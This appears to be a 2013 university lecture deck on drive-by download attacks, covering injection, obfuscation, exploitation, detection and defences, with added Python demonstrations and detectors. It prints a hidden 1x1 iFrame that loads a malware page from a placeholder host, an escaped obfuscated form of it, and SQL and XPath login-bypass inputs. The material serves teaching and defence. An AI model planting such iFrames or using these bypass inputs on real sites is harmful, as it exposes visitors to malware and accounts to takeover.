Drive-By Downloads
Presenter: Darakhshan Naz
Teacher: Professor Dr. Muhammad Mubashir Khan
04.05.2013
Agenda
 Introduction
 Mechanisms of Drive-by Download
 General Detection Approach
 Security Measures
 Assessment & Conclusion
What is Drive-by Download?
 A technique that involves
◦ Intended downloads made without understanding the consequences
 E.g. executables
◦ Unintended downloads
 E.g. viruses, spyware
 Can happen by:
◦ Visiting a website
◦ Viewing an email message
 Installs a malicious program, termed malware
◦ Through the malware, the attacker gets full or partial control of the victim's system
Example Scenario: Drive-By Download!
(Source of concept: report "Defence against Drive-by Download", National Security Agency, US)
The user is completely unaware of the attack.
(1) User opens the browser.
(2) User reads an email that contains a website link.
(3) The link attracts the user's interest; the user clicks it. The website has many links.
(4) User goes to the website.
(5) User surfs every site but gets bored (no interest develops) and closes the website.
(6) Attacker sends the user a spoofed email.
(7) Attacker sends malicious code to the user's browser and exploits a vulnerability.
(8) The malicious code creates a connection between the user and the attacker.
(9) The attacker downloads and installs its backdoor program.
(10) The attacker steals all the user's important files and compromises him over the network.
Purpose of Drive-by Download
• Provide a gateway to botnets.
• Take advantage of vulnerabilities.
• Steal personal or confidential information of the user.
• Lead or redirect the user to other malicious websites and compromise him.
Mechanisms of Drive-by Download
Basic Concept of Drive-by Download Attack (Source: [1]): figure of the attack in stages 1 to 4, grouped into two phases, Injection and Exploitation.
Injection
 What is injection:
◦ The act of entering data into an application, bypassing its security controls, to change its behaviour in an unexpected way.
 Reason for injection:
◦ Existence of vulnerabilities.
 A Drive-by Download is initiated by the injection of malicious code into a database, application or server.
 Ways of injecting malicious code:
◦ Injection through iFrames
◦ SQL Injection
◦ XPath Injection
How and where to inject?
(Source: http://www.malware-info.com/mal_faq_inject.html)
• SQL Injection
• XPath Injection
• Injection through iFrames
• Malware placed directly on the web server
Injection through iFrames
 The most basic form of injected code is a malicious iFrame such as:
 Example:
<div style="visibility: hidden; position: absolute; top: 1px">
<iframe id="IFRAME" name="IFRAME"
src="http://www.example.com/page_with_malware.htm"
scrolling="no" width="1" height="1" vspace="0"
hspace="0" frameborder="0">
</iframe>
</div>
 This iFrame is present in the HTML of a requested web page.
 Content from this source renders in an invisible 1 pixel x 1 pixel window.
 Sometimes iFrames are present in an encoded form that looks normal. The process of encoding is known as "obfuscation".
Obfuscation
 The process of disguising code through encoding.
 The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.
 Encoding tool: http://www.auditmypc.com/html-encoder.asp
 When the injected page is browsed, the JavaScript dynamically generates the iframe.
 This causes malicious content from a website controlled by the attacker to execute inside the requested web page.
Obfuscation
 Obfuscated form of the iFrame (the \uXXXX escapes decode to "<div s", the start of the hidden div above; the rest of the string is truncated here):
<script type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0073\u00…');</script>
SQL Injection
 Bypasses the authentication process.
 Provides access to data for a malicious user or attacker.
 Example: in any user login form, if we enter
Username: ' or '1'='1  and  Password: ' or '1'='1
then the web page will execute this query:
SELECT * FROM Users
WHERE Username = '' OR '1' = '1'
AND Password = '' OR '1' = '1'
 The injected condition is always logically true, so the authentication check passes and the attacker can get access to any account in the database.
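Added example (not from the slides): the login check above built by string concatenation, run with the slide's input against a constructed in-memory SQLite table, beside the parameterized form that treats the same input as data. The table, the account John/test123 and the function names are constructed for this example.

```python
import sqlite3

# Constructed sample data: an in-memory Users table with a single account.
# Passwords are stored in clear only to keep the sample short.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('John', 'test123')")
    return conn


# The input from the slide, typed into both the username and password fields.
SLIDE_PAYLOAD = "' or '1'='1"


def vulnerable_query(username, password):
    """Builds the statement by string concatenation, so quotes in the input become SQL syntax."""
    return ("SELECT * FROM Users WHERE Username='" + username +
            "' AND Password='" + password + "'")


def login_vulnerable(conn, username, password):
    """The login check the slide describes: any row returned counts as authenticated."""
    return conn.execute(vulnerable_query(username, password)).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: the driver binds the inputs as values, never as part of the SQL text."""
    query = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(SLIDE_PAYLOAD, SLIDE_PAYLOAD))
    print("vulnerable login with payload:   ", login_vulnerable(db, SLIDE_PAYLOAD, SLIDE_PAYLOAD))
    print("parameterized login with payload:", login_parameterized(db, SLIDE_PAYLOAD, SLIDE_PAYLOAD))
    print("parameterized login, real creds: ", login_parameterized(db, "John", "test123"))
```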
XPath Injection
 Very similar to SQL Injection.
 Now the target is an XML document.
 The insecurity is caused by injecting XPath queries or conditions through the web page.
 Example:
◦ If a user has an account on a site with Username = John and Password = test123, then logically he will see only his own account.
◦ If the same user enters his username as John' or 1 = 1 with the same password, then the system will authenticate him and show him the entire XML document.
Mechanism of Drive-by Download
Basic Concept of Drive-by Download Attack (Source: [1]): the same figure of stages 1 to 4, now focusing on the second phase, Exploitation.
Exploitation
 What is exploitation:
◦ Activities an attacker performs at will on the victim's system after gaining full or partial control.
 Reasons for exploitation:
◦ Users neglect to update installed applications.
◦ According to Secunia PSI, about 95.46% of users have one or more insecure applications.
◦ A newer version may fix one or more vulnerabilities in the installed application.
 Vulnerabilities that are mostly exploited:
◦ Browser vulnerabilities.
◦ Plugin vulnerabilities.
◦ File format vulnerabilities.
Types of Vulnerabilities
 Browser vulnerability
◦ The attacker injects malicious code into the user's browser and changes its settings without his knowledge.
 Plugin vulnerability
◦ Plugins are provided by third parties and can be vulnerable; this may lead to buffer overflows, memory corruption issues and pointer overwrites.
 File format vulnerability
◦ Attackers attach malware to Word, Excel or PDF files, distributed through email or websites. The exploit occurs when the editing program opens them.
General Detection Approach
 JavaScript-based malware is difficult to detect and analyze.
 Requires a comprehensive approach that detects both the root cause and the dynamic behaviour.
 Specialized detection methods:
◦ CUJO [2]
 Static + dynamic analysis of JavaScript
 Detection through machine learning
◦ ARROW [8]
 Creates regular expression signatures for the servers of malware distribution networks (MDNs).
 Evaluates their effectiveness.
Here the generalized detection approach will be discussed, which is the basic idea behind detection.
Step 1: Analysis of JS Redirection
 For an effective detection approach, analysis of JavaScript is mandatory.
• The user is victimized in two ways:
• Either he is directly exposed to the vulnerable site,
• or the attacker reaches him through a series of redirections.
 Two approaches can be taken to investigate redirections:
◦ Hooking into the JavaScript code (e.g. document.location).
◦ Taking the browser's history.
Step 2: JavaScript Deobfuscation
 Most malicious JavaScript is in obfuscated (encoded) form.
 Deobfuscation (conversion from the complex form back to the simple form) can help to identify malicious code.
 It can be done manually or with an automated tool.
 Automated tools, e.g.:
◦ Developer Tools in Google Chrome.
◦ Microsoft Script Debugger or Editor.
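Added example, not from the slides, covering the Obfuscation slide and this step together: a Python deobfuscator for the document.write('\uXXXX…') pattern, followed by a scan of the decoded markup for the hidden 1x1 iFrame shown earlier. The sample page, the placeholder host malware.example.invalid and the function names are constructed for this example; the encoder is included only to build the sample, as the slide's online encoder would.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the hidden 1x1 iFrame pattern from the slides, pointing at a
# placeholder host. A real page would carry a real URL here.
PLAIN_IFRAME = (
    '<div style="visibility: hidden; position: absolute; top: 1px">'
    '<iframe id="IFRAME" name="IFRAME" src="http://malware.example.invalid/page.htm" '
    'scrolling="no" width="1" height="1" frameborder="0"></iframe></div>'
)


def js_unicode_escape(text):
    """Encode text as a JavaScript \\uXXXX string, what an 'HTML encoder' tool produces."""
    return "".join("\\u%04x" % ord(ch) for ch in text)


# Constructed sample page: the iFrame is not visible in the HTML source; it only
# exists as an escaped string that document.write() emits at render time.
OBFUSCATED_PAGE = (
    "<html><body><p>Welcome</p>"
    "<script type=\"text/javascript\">document.write('"
    + js_unicode_escape(PLAIN_IFRAME)
    + "');</script></body></html>"
)

DOC_WRITE_RE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
UNICODE_ESC_RE = re.compile(r"\\u([0-9a-fA-F]{4})")
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_js_string(literal):
    """Resolve \\uXXXX and \\xXX escapes the way the JavaScript engine would."""
    literal = UNICODE_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def static_document_writes(page):
    """Return the decoded markup each document.write('...') call would emit."""
    return [decode_js_string(m.group(2)) for m in DOC_WRITE_RE.finditer(page)]


def _px(value):
    """Parse a width/height attribute ('1', '1px') into an int; None if absent or unparseable."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Flags <iframe> elements that are 1 pixel in size or nested in a hidden container."""

    def __init__(self):
        super().__init__()
        self.stack = []      # (tag, is_hidden) for every open element
        self.findings = []   # (iframe src, list of reasons)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").lower().replace(" ", "")
        is_hidden = "visibility:hidden" in style or "display:none" in style
        if tag == "iframe":
            reasons = []
            w, h = _px(a.get("width")), _px(a.get("height"))
            if (w is not None and w <= 1) or (h is not None and h <= 1):
                reasons.append("1x1 frame")
            if is_hidden or any(hidden for _, hidden in self.stack):
                reasons.append("hidden container")
            if reasons:
                self.findings.append((a.get("src", ""), reasons))
        self.stack.append((tag, is_hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerate sloppy, unclosed markup.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def scan_page(page):
    """Deobfuscate document.write() payloads, then look for hidden iframes in what they emit."""
    finder = HiddenIframeFinder()
    finder.feed(page)                       # markup already present in the HTML
    for markup in static_document_writes(page):
        finder.feed(markup)                 # markup the script would write at runtime
    return finder.findings


if __name__ == "__main__":
    for src, reasons in scan_page(OBFUSCATED_PAGE):
        print("suspicious iframe -> %s (%s)" % (src, ", ".join(reasons)))
```

The static pass only resolves escapes; scripts that assemble the string at runtime still need the debugger-based deobfuscation the slide lists.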
Step 3: Detection of Memory Corruption
 Most attacks corrupt memory.
 The attacker tries to get into the browser and run his shellcode.
◦ Shellcode is a small piece of code through which the attacker gets control of the victim's system.
• The attacker then uses JavaScript to allocate a large number of strings for the shellcode.
• These strings are not part of the real code; they exist only for the memory allocation the attacker needs.
• Detection of these strings can give an indication of shellcode.
Contd.
 Detection of these strings can be done in two ways:
◦ Tracking string variables whenever they are created.
◦ For automated detection, the libemu library is used.
 It scans from each character and, when it finds a sequence of valid instructions, reports shellcode.
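Added example, not from the slides: a small static heuristic in Python for the string-allocation pattern Step 3 describes (escaped byte strings grown by self-concatenation and copied into many array slots), the kind of pre-filter that decides which scripts are worth handing to an emulator such as libemu. Both JavaScript samples are constructed; the spray-like one carries a placeholder string instead of any payload.

```python
import re

# Constructed sample: the allocation skeleton Step 3 describes. The "code" string is a
# placeholder, not a payload; only the allocation structure matters to the heuristic.
SPRAY_LIKE_JS = """
var pad = unescape("%u0c0c%u0c0c%u0c0c%u0c0c");
while (pad.length < 0x40000) pad += pad;
var code = "PAYLOAD_PLACEHOLDER";
var blocks = new Array();
for (var i = 0; i < 400; i++) blocks[i] = pad + code;
"""

# Constructed sample: ordinary page script with a loop and string building, for contrast.
BENIGN_JS = """
var items = ["apple", "pear", "plum"];
for (var i = 0; i < items.length; i++) { list.appendChild(makeItem(items[i])); }
var greeting = "Hello, " + user.name + "!";
"""

# Two or more consecutive %uXXXX escapes: a byte pattern smuggled in as text.
UNICODE_ESCAPE_RUN = re.compile(r"(?:%u[0-9a-fA-F]{4}){2,}")
# while (x.length < N) x += x;  -> a string doubled until it reaches a target size.
DOUBLING_LOOP = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<\s*(?:0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1")
# for (...) arr[i] = ...;  -> many copies of a string placed into an array.
ARRAY_FILL = re.compile(r"for\s*\([^)]*\)\s*(\w+)\s*\[\s*\w+\s*\]\s*=")
STRING_LITERAL = re.compile(r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\'')


def heap_spray_indicators(js):
    """Count the individual signals; each one alone is common in benign code."""
    literals = STRING_LITERAL.findall(js)
    return {
        "unicode_escape_runs": len(UNICODE_ESCAPE_RUN.findall(js)),
        "doubling_loops": len(DOUBLING_LOOP.findall(js)),
        "array_fill_loops": len(ARRAY_FILL.findall(js)),
        "long_string_literals": sum(1 for s in literals if len(s) > 64),
    }


def looks_like_heap_spray(js):
    """Flag only the combination the slide describes: escaped bytes, grown, then copied many times."""
    ind = heap_spray_indicators(js)
    return (ind["unicode_escape_runs"] >= 1
            and ind["doubling_loops"] >= 1
            and ind["array_fill_loops"] >= 1)


if __name__ == "__main__":
    for name, js in (("spray-like", SPRAY_LIKE_JS), ("benign", BENIGN_JS)):
        print(name, heap_spray_indicators(js), "->", looks_like_heap_spray(js))
```

Deobfuscate first (Step 2) and run this on the decoded script; the patterns are easy to hide behind string building, which is why the slide pairs the static view with emulation.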
Step 4: Investigation of Exploitation
 Exploitation is the last step of a Drive-by Download attack, the one that takes advantage of vulnerabilities.
 It can be detected in two ways:
◦ Analysis of the behaviour of browsers and plug-ins.
◦ Monitoring of strings passed as parameters and of method calls. Usually long strings are used in exploits, and certain methods are called when downloading malware.
Security Measures
 Keep software updated.
 Install web-filtering software.
 Implement BLADE (Block All Drive-by Download Exploits) [7].
 Proper management by network administrators.
 Users should be careful while visiting sites, especially entertainment and social sites, as they may host adversaries.
 Use reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.
 Use a virtual machine for web browsing.
The Good
 Automated deobfuscation techniques (compiler or library based) are really helpful for identifying malicious JavaScript.
 Detection should be focused on central points.
◦ EvilSeed [11] provides a crawling approach that focuses on the central points of malware distribution.
 Machine learning can provide lightweight JavaScript analysis, fast detection mechanisms and handling of vulnerabilities at runtime.
 Proper input validation can reduce SQL and XPath injection.
The Bad
 Can happen easily but is very hard to overcome.
 The possibilities of attack are increasing rapidly, but validating detection approaches is not always possible.
 A defensive approach is better for fighting these attacks, for two reasons:
◦ Intense dynamic behaviour.
◦ Complex and time-consuming detection approaches.
The Ugly
 Mostly shows unexpected behaviour.
 Due to the diversity of attack methods, it has a high ratio of victims, and it is difficult to design a detection approach that covers all possibilities.
 No computing device seems to be safe from Drive-by Download.
 As Drive-by Download attacks are increasing enormously, perhaps in the near future hard drive or portable device vulnerabilities may also be exploited.
Thanks for your attention
References (1)
[1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009).
[2] Rieck, K., Krueger, T., Dewald, A.: CUJO: Efficient Detection and Prevention of Drive-by Download Attacks. Technische Universität Berlin.
[3] Stone-Gross, B., Cova, M., Kruegel, C., Vigna, G.: Peering through the iFrame. University of California; University of Birmingham.
[4] Westervelt, R.: Kaspersky website hacked (February 2009).
[5] Cova, M., Kruegel, C., Vigna, G.: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code. University of California, Santa Barbara. From the ACM Digital Library.
[6] Interesting statistics from the Secunia PSI (January 2008). http://secunia.com/blog/18
References (2)
[7] Lu, L., Yegneswaran, V., Porras, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections. College of Computing, Georgia Institute of Technology; SRI International. From the ACM Digital Library.
[8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W.: ARROW: Generating Signatures to Detect Drive-By Downloads. Georgia Institute of Technology; Microsoft Bing; Microsoft Research.
[9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers. Indian Institute of Technology, Guwahati, India.
[10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.: All your iFrames point to us. Google Inc.; Johns Hopkins University.
[11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P. M., Kruegel, C., Vigna, G.: EVILSEED: A Guided Approach to Finding Malicious Web Pages. 2012 IEEE Symposium on Security and Privacy.

Contenu connexe

Tendances

8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020SecPod Technologies
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 
14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awarenessMichel Bitter
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingYvonne Marambanyika
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Rishabh Upadhyay
 
Cyber crime and cyber security
Cyber crime and cyber  securityCyber crime and cyber  security
Cyber crime and cyber securityKeshab Nath
 
Phishing définition, statistiques, solutions
Phishing   définition, statistiques, solutionsPhishing   définition, statistiques, solutions
Phishing définition, statistiques, solutionsStephane Manhes
 
Spywares & Keyloggers
Spywares & KeyloggersSpywares & Keyloggers
Spywares & KeyloggersJithin James
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatiquedynamicemploi
 

Tendances (20)

8 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 20208 Types of Cyber Attacks That Can Bother CISOs in 2020
8 Types of Cyber Attacks That Can Bother CISOs in 2020
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 
Malware
MalwareMalware
Malware
 
14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness14 tips to increase cybersecurity awareness
14 tips to increase cybersecurity awareness
 
What is Ransomware
What is RansomwareWhat is Ransomware
What is Ransomware
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration Testing
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
Sigma and YARA Rules
Sigma and YARA RulesSigma and YARA Rules
Sigma and YARA Rules
 
Spyware
SpywareSpyware
Spyware
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdf
 
Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report Vulnerability Assessment and Penetration Testing Report
Vulnerability Assessment and Penetration Testing Report
 
Cyber crime and cyber security
Cyber crime and cyber  securityCyber crime and cyber  security
Cyber crime and cyber security
 
Hydra
HydraHydra
Hydra
 
malware
malware malware
malware
 
Phishing définition, statistiques, solutions
Phishing   définition, statistiques, solutionsPhishing   définition, statistiques, solutions
Phishing définition, statistiques, solutions
 
Spywares & Keyloggers
Spywares & KeyloggersSpywares & Keyloggers
Spywares & Keyloggers
 
CyberSecurity
CyberSecurityCyberSecurity
CyberSecurity
 
Web application security
Web application securityWeb application security
Web application security
 
10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique10 règles de securite de la sécurité informatique
10 règles de securite de la sécurité informatique
 

Similaire à Drive by downloads-cns

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021IJMER
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.pptKaukau9
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?Peter Wood
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Security Testing
Security TestingSecurity Testing
Security TestingISsoft
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat ModelingDanny Wong
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners Checkmarx
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 

Similaire à Drive by downloads-cns (20)

Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Cq3210191021
Cq3210191021Cq3210191021
Cq3210191021
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
30ITSecurityThreatsVulnerabilitiesandCountermeasuresV1.ppt
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Security testing
Security testingSecurity testing
Security testing
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
7 Steps to Threat Modeling
7 Steps to Threat Modeling7 Steps to Threat Modeling
7 Steps to Threat Modeling
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners
 
Methods Hackers Use
Methods Hackers UseMethods Hackers Use
Methods Hackers Use
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
FALCON.pptx
FALCON.pptxFALCON.pptx
FALCON.pptx
 

Plus de mmubashirkhan

Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 
Situational awareness for computer network security
Situational awareness for computer network securitySituational awareness for computer network security
Situational awareness for computer network securitymmubashirkhan
 
Security threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkSecurity threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkmmubashirkhan
 
Comparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnComparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnmmubashirkhan
 
Security in wireless la ns
Security in wireless la ns Security in wireless la ns
Security in wireless la ns mmubashirkhan
 
Saa s multitenant database architecture
Saa s multitenant database architectureSaa s multitenant database architecture
Saa s multitenant database architecturemmubashirkhan
 
Improving intrusion detection system by honeypot
Improving intrusion detection system by honeypotImproving intrusion detection system by honeypot
Improving intrusion detection system by honeypotmmubashirkhan
 
Cyber security issues
Cyber security issuesCyber security issues
Cyber security issuesmmubashirkhan
 
Biometric security tech
Biometric security techBiometric security tech
Biometric security techmmubashirkhan
 
Authentication in manet
Authentication in manetAuthentication in manet
Authentication in manetmmubashirkhan
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 

Plus de mmubashirkhan (11)

Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcit
 
Situational awareness for computer network security
Situational awareness for computer network securitySituational awareness for computer network security
Situational awareness for computer network security
 
Security threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g networkSecurity threats and countermeasure in 3 g network
Security threats and countermeasure in 3 g network
 
Comparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpnComparison between traditional vpn and mpls vpn
Comparison between traditional vpn and mpls vpn
 
Security in wireless la ns
Security in wireless la ns Security in wireless la ns
Security in wireless la ns
 
Saa s multitenant database architecture
Saa s multitenant database architectureSaa s multitenant database architecture
Saa s multitenant database architecture
 
Improving intrusion detection system by honeypot
Improving intrusion detection system by honeypotImproving intrusion detection system by honeypot
Improving intrusion detection system by honeypot
 
Cyber security issues
Cyber security issuesCyber security issues
Cyber security issues
 
Biometric security tech
Biometric security techBiometric security tech
Biometric security tech
 
Authentication in manet
Authentication in manetAuthentication in manet
Authentication in manet
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 

Dernier

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
